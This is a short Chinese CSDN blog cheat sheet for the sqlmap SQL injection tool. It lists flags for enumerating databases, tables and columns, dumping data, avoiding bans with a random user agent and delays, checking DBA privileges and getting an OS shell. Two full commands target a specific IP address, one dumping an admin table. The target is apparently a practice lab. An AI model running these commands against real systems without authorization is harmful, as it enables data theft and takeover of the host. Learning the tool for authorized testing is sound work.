Sqlmap

本文介绍了SQL注入工具Sqlmap的使用方法,包括获取数据库名、指定库、表、字段及数据等操作。还提到了一些高级技巧,如随机User-Agent、延时设置和权限检测,以及潜在的危险命令如获取数据库中的数据。此外,文章还讨论了如何通过Sqlmap来检测注入点的数据库权限,甚至可能获取目标系统的cmd权限。
摘要由CSDN通过智能技术生成

Sqlmap

  • --dbs =>获得库名 
    • python sqlmap.py -u http://59.63.200.79:8003/?id=1 --dbs
  • -D =>指定库
  • --tables =>表
  • -T =>指定表
  • --columns =>字段
  • -C =>指定字段
  • --dump =>获取数据库中的数据(高危命令)脱库
    • python sqlmap.py -u http://59.63.200.79:8003/?id=1 -D maoshe -T admin --dump
  • 常见指令
    • --random-agent =>选择随机user-agents头
    • --delay=1 =>每次探测延时1秒(防止访问过快被ban)
    • --count =>查看数据量
    • --level =>测试等级
    • --risk =>sqlmap语句复杂度  (--level 3 --risk 2)
    • --is-dba =>检测注入点的数据库权限
    • --os-shell =>直接获得目标的cmd权限(必须is-dba为true)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值